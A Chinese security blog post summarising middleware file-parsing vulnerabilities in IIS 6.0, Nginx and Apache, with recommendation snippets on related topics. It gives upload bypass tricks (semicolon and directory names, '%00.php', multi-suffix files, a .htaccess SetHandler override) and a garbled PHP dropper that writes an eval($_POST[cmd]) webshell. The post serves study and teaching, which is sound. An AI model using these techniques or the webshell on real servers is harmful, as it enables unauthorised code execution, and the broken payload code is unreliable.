中间件解析漏洞

最新推荐文章于 2024-04-06 23:52:19 发布
最新推荐文章于 2024-04-06 23:52:19 发布
阅读量296 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52223347/article/details/111682748
版权

IIS 5.x/6.0解析漏洞
解析利用
1.目录解析
xx.asp/xx.jpg

在网站下建立后缀为.asp 或 .asa的文件夹,其目录内的文件不管什么扩展名都会被IIS当作asp类型文件来解析并执行。

2.文件解析
*.asp;,jpg

lIS6.0下, 分号后面的不被解析,也就是说
xx.asp;* .jpg 分号后面不解析
会被服务器看成是*.asp
IIS6.O默认的可执行文件除了asp还包含三种

  • .asa
  • .cer
  • .cdx

IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
Nginx解析漏洞
在默认Fast-CGI开启状况下 上传.jpg/.gif的木马文件 内容为

<?PHP fputs(fopen'shell.php';W),;<?php eval($_ POST[cmd])?>");?>

的文件,然后访问 这个.jpg文件 语句被执行 生成一个shell.php

Nginx <8.03空字节代码执行漏洞
影响版本:0.5,0.6, 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx在图片中写入PHP代码然后通过访问
xxx.jpg%00.php
来执行其中的代码

Apache解析漏洞
Apache是从右到左开始判断解析,如果不解析就再往左判断,直到可以解析为止

判断是不是合法的后缀
尝试上传多个后缀的文件xx.php.gif.jpg

在windows环境下,后缀加空格 或 加点(.)windows 会默认除去空格或点,利用这个特性
向主机上传文件时可以抓包修改文件后缀绕过黑名单

Apache .htaccess文件
如果可以上传这个文件(Apache httpd.conf 配置AllowOverride 为All时,apache会应用目录下.htaccess中的配置
<FilesMatch “xx.jpg”> SetHandler application/x-httpd-php </ FilesMatch>
然后上传的jpg文件解析成php执行。

欲望川
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web安全--文件上传中间件解析漏洞
nareku的博客
04-06 1403
前言 虚拟机还没有安装好所以还没有进行漏洞复现实操,但是又怕忘了所以就记下先。 一.Apache 1)Apache低版本解析漏洞 例:两个文件 1.php 和 2.php.XXX 1.php文件内容: <?php phpinfo();?> 2.php.XXX文件内容: <?php phpinfo();?> 两个文件上传后得到的结果一样,说明2.php.XXX是被当成php文件来执行的 原理: 在解析2.php.XXX 文件时,先识别最后的XXX,如果无法识别出来,则向
解析漏洞总结
whatday的专栏
01-31 5516
一、IIS 5.x/6.0解析漏洞 IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 2.文件解析 sp.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 sp.asp,那么 /sp.asp/1.jpg   将
中间件解析漏洞(服务器配置错误)
最新发布
m0_69043895的博客
04-06 1249
AddType :在给定的文件扩展名与特定的内容类型之间建立映射AddType 是与类型表相关的,描述的是扩展名与文件类型之间的关系,例如:AddType application/x-httpd-php .jpg ,表示 .jpg 扩展名的文件就是 application/x-httpd-php 类型的。也就是说 php3 , php4 , php5 , pht , phtml 等文件后缀也是可以被当作 php 文件进行解析的。上传成功后直接访问,此时可以看到,info.php.uiottd已经成功执行。
常见中间件漏洞的总结
qq_40898302的博客
06-07 8977
常见中间件漏洞总结
中间件】一些中间件的相关漏洞总结
Monsterlz123的博客
07-16 2127
中间件】一些中间件的相关漏洞总结 Hello,各位小伙伴晚上好~ 这里是你们连续三天发文,高产似母猪的小编。 今天跟大家唠唠一些常见的中间件漏洞 包括常见的IIS、Apache、Nginx以及Tomcat 废话不多说,让我们直接开始吧~ (好啦我承认今天的表情包是因为好想去迪斯尼,难道是上年纪了吗,嗯?) 目录 一、IIS IIS 6.0 解析漏洞 IIS 7.5 解析漏洞 IIS 6...
第一节 中间件解析漏洞-IIS6.0-01
09-15
"中间件解析漏洞-IIS6.0-01" 中间件解析漏洞是指在Web应用程序中,因服务器或中间件解析机制存在漏洞,导致攻击者可以上传恶意文件,从而控制服务器或获取敏感信息。下面将对IIS6.0中间件解析漏洞进行详细介绍。 ...
中间件内存马注入&冰蝎连接(附更改部分代码)1
08-03
中间件内存马注入是一种利用软件漏洞在服务器内存中植入恶意代码的技术,常见于攻击者对Web应用程序的安全渗透。本文主要探讨了如何在冰蝎(Icesword)源码基础上增加对JSP的内存马注入支持,并分析了相关原理,同时...
常考渗透测试面试题.pdf
09-29
本文总结了渗透测试面试题,涵盖了渗透测试的各种知识点,包括漏洞类型、漏洞原理、修复方案、工具使用、Webshell上传、SQL注入、XSS、CSRF、SSRF、XML注入、逻辑漏洞、越权访问、Java和PHP框架、中间件解析漏洞等。...
CISP模拟考试题及答案
07-13
英文为Certified Information Security Professional (简称CISP),CISP系经中国信息安全产品测评认证中心(已改名中国信息安全测评中心)实施国家认证。CISP是强制培训的。如果想参加CISP考试,必须要求出具授权培训...
常考渗透测试面试题.docx
03-30
"渗透测试面试题" 本文总结了渗透测试面试题中的知识点,涵盖了网络安全、漏洞原理、修复方案、工具...* 中间件解析漏洞:恶意数据被注入到中间件中,导致数据泄露。 * 中间件安全:输入验证、输出编码、限制权限等。
中间件解析漏洞详解及演示
qq_41679358的博客
08-19 1万+
解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。
渗透测试-中间件解析漏洞分析
lza20001103的博客
04-27 3999
中间件解析漏洞分析
常见中间件漏洞总结
爱上卿的博客
01-25 1万+
1. Weblogic常见漏洞 2. Tomcat常见漏洞 3. Nginx常见漏洞 4. JBOSS常见漏洞 中间件简介 中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种 软件在不同的技术之间共享资源。中间件位于客户机/ 服务器的操作系统 之上,管理计算机资源和网络通讯。是连接两个独立应用程序或独立系统 的软件。相连接的系统,即使它们具有不同的接口,但通过中间件相互之 间仍能交...
apache、nginx、Tomcat、IIS引擎解析漏洞
Ramona的博客
02-03 687
                                        引擎解析漏洞 常见的web容器有IIS、Apache、Nginx、Tomcat等,以下是详细讲解 IIS         IIS简介 是Windows系统提供的一种服务,它包括WWW服务器、FTP服务器和SMTP服务器          IIS 6.0 当建立*.asa,*.asp格式的文件夹时...
中间件漏洞汇总
热门推荐
LainWith的博客
11-26 1万+
目录一些地址什么是中间件iis6x篇PUT漏洞漏洞描述漏洞复现防御方式解析漏洞-基于文件名原理复现防御解析漏洞-基于文件夹原理复现防御IIS短文件漏洞介绍原理复现防御RCE-CVE-2017-7269介绍影响范围复现防御iis7x篇文件解析漏洞原理复现防御HTTP.SYS远程代码执行(MS15-034)介绍影响范围影响版本复现修复建议apache篇未知扩展名解析漏洞漏洞原理复现修复建议AddHandler导致的解析漏洞原理复现修复建议目录遍历漏洞原理复现防御Apache HTTPD 换行解析漏洞(CVE-2
中间件漏洞小结
qq_43211396的博客
01-25 805
最近不准备挖SRC了,沉淀一下学学知识。 常见的web中间件 iis,apache,tomcat,nginx,jboss, Weblogic 1.1 PUT漏洞 IIS6.0 IIS Server 在 Web 服务扩展中开启了 WebDAV ,配置了可以写入的权限,造成任意文件上传。 用burpsuite 提交OPTIONS 查看支持的协议 PUT /test.txt HTTP/1.1 Host: upload.moonteam.com Content-Length: 25 &
常见的中间件解析漏洞
09-27
常见的中间件解析漏洞包括: 1. IIS 6.0的文件解析漏洞:当处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。这个漏洞可以通过在文件名后添加特定的字符串进行利用。 2. Apache的多后缀解析...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值